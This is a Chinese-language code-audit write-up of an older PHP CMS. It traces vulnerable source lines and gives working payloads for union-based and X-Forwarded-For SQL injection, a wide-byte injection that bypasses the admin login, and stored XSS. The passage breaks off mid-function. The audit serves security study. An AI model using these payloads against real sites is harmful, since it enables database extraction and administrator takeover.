漏洞路径在ad_js.php
12345678910111213141516171819202122232425262728293031323334注入出现在第13行,虽然$ad_id经过了addslashes函数的转义,但是在sql语句中,并没有使用单引号进行包裹,addslashes函数并没有发挥作用,产生了注入,输出在了注释里。
Payload: -1 union select 1,2,3,4,5,6,user()
XFF注入在配置文件./include/common.inc.php中,第30~36中过滤了大部分,但缺少了$_SERVER
1234567if(!get_magic_quotes_gpc()){$_POST = deep_addslashes($_POST);$_GET = deep_addslashes($_GET);$_COOKIES = deep_addslashes($_COOKIES);$_REQUEST = deep_addslashes($_REQUEST);}漏洞出现在include/common.fun.php中的getip()函数中
12345678910111213141516171819202122232425262728function getip(){if (getenv('HTTP_CLIENT_IP')){$ip = getenv('HTTP_CLIENT_IP'); }elseif (getenv('HTTP_X_FORWARDED_FOR')) { //获取客户端用代理服务器访问时的真实ip 地址$ip = getenv('HTTP_X_FORWARDED_FOR');}elseif (getenv('HTTP_X_FORWARDED')) { $ip = getenv('HTTP_X_FORWARDED');}elseif (getenv('HTTP_FORWARDED_FOR')){$ip = getenv('HTTP_FORWARDED_FOR'); }elseif (getenv('HTTP_FORWARDED')){$ip = getenv('HTTP_FORWARDED');}else{ $ip = $_SERVER['REMOTE_ADDR'];}return $ip;}通过getenv()函数获取环境变量的值,可通过X-Forwarded-For伪造。全局搜索看哪里有调用该函数
先看第一处调用:comment.php,第114行处
12345678910111213141516171819202122232425262728if($act == 'send'){if(empty($id)){ return false; } $user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0; $mood = intval($_POST['mood']); $content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : ''; $content = nl2br($content); $type = intval($_POST['type']); if(empty($content)) { showmsg('评论内容不能为空'); } if($_CFG['comment_is_check'] == 0) { $is_check = 1; } else {$is_check = 0;} $sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')"; $db->query($sql);在sql语句中直接使用getip(),没有任何的过滤,根据代码构造payload
Payload: X-Forwarded-For: 1’ and sleep(5) and ‘1’=’1
第二处调用:./include/common.inc.php,第45行
1$online_ip = getip();getip()赋值给变量$online_ip,全局搜索该变量,在guest_book.php中第45行找到了未过滤利用点,直接拼接online_ip到sql语句中
123456789101112131415elseif ($act == 'send'){$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;$rid = intval($_POST['rid']); $content = !empty($_POST['content']) ? htmlspecialchars($_POST['content']) : ''; $content = nl2br($content); if(empty($content)) { showmsg('评论内容不能为空'); }$sql = "INSERT INTO " . table('guest_book') . " (id, rid, user_id, add_time, ip, content) VALUES ('', '$rid', '$user_id', '$timestamp', '$online_ip', '$content')";$db->query($sql);showmsg('恭喜您留言成功', 'guest_book.php?page_id='.$_POST['page_id']);}利用有两种方法,第一种是X-Forwarded-For: 1' and sleep(5) and '1'='1使用时间盲注。第二种方法是利用留言处回显。
Payload: X-Forwarded-For: 1’,database()) #
宽字节注入在网站数据库配置文件./data/config.php中可以看到使用gb2312编码方式
后台登陆路径./admin/login.php,使用check_admin()函数检查账号密码
跟进该函数,在./admin/include/common.fun.php第179行
12345678910111213function check_admin($name, $pwd){global $db;$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$name' and pwd = md5('$pwd')"); if($row['num'] > 0) { return true; } else { return false; }}$_POST过来的数据经过addslashes()函数转义,利用%df让转义的\失效,从而造成宽字节注入。
抓包在burp里面修改,输入在浏览器中会被urlcode编码。
Payload: admin_name=1%df’+or+1=1%23
union sql 注入2(后台)漏洞路径在./admin/article.php中第131~139行
123456789elseif($act == 'del'){$article = $db->getone("SELECT cid, lit_pic FROM ".table('article')." WHERE id=".$_GET['id']);$sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']);$db->query($sql);if (file_exists(BLUE_ROOT.$article['lit_pic'])) {@unlink(BLUE_ROOT.$article['list_pic']);}showmsg('删除本地新闻成功', 'article.php?cid='.$article['cid']);}从前端GET过来的id参数直接插入sql语句中,未做任何过滤
Payload: act=del&id=-1 union select user(),2
union sql 注入3(后台)漏洞路径在./admin/nav.php中第63~70行
12345678elseif($act=='edit'){$sql = "select * from ".table('navigate')." where navid = ".$_GET['navid'];$nav = $db->getone($sql);$smarty->assign('nav',$nav);$smarty->assign('act', $act);$smarty->display('nav_info.htm');}从前端GET过来的navid参数直接插入sql语句中,未做任何过滤
Payload: act=edit&navid=-1 union select 1,user(),database(),4,version(),6 –+
0x02 XSS存储型XSS1漏洞路径在./user.php中第134~140行
1234567elseif($act == 'do_reg'){$user_name =!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';$pwd= !empty($_POST['pwd']) ? trim($_POST['pwd']) : '';$pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';$email = !empty($_POST['email']) ? trim($_POST['email']) : '';$safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';$from = !empty($from) ? base64_decode($from) : 'user.php';$email的过滤只有trim()函数首尾去空,和common.inc.php文件中的addslashes()函数对单双引号进行转义。由于前端存在格式校验,所以抓包进行修改。
或者是正常注册用户后,在用户个人管理处直接修改,无须抓包
存储型XSS2漏洞路径同样在./user.php中第266行
12345678910111213elseif ($act == 'do_add_news') {include_once 'include/upload.class.php';$image = new upload();$title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : '';$color = !empty($_POST['color']) ? htmlspecialchars(trim($_POST['color'])) : '';$cid = !empty($_POST['cid']) ? intval($_POST['cid']) : '';if(empty($cid)){showmsg('新闻分类不能为空');}$author = !empty($_POST['author']) ? htmlspecialchars(trim($_POST['author'])) : $_SESSION['admin_name'];$source = !empty($_POST['source']) ? htmlspecialchars(trim($_POST['source'])) : '';$content = !empty($_POST['content']) ? filter_data($_POST['content']) : '';$descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 90) : mb_substr(html2text($_POST['content']),0, 90);$content参数经过filter_data()函数过滤,跟踪该函数在./include/common.fun.php中第985~989行
12345function filter_data($str){$str = preg_replace("/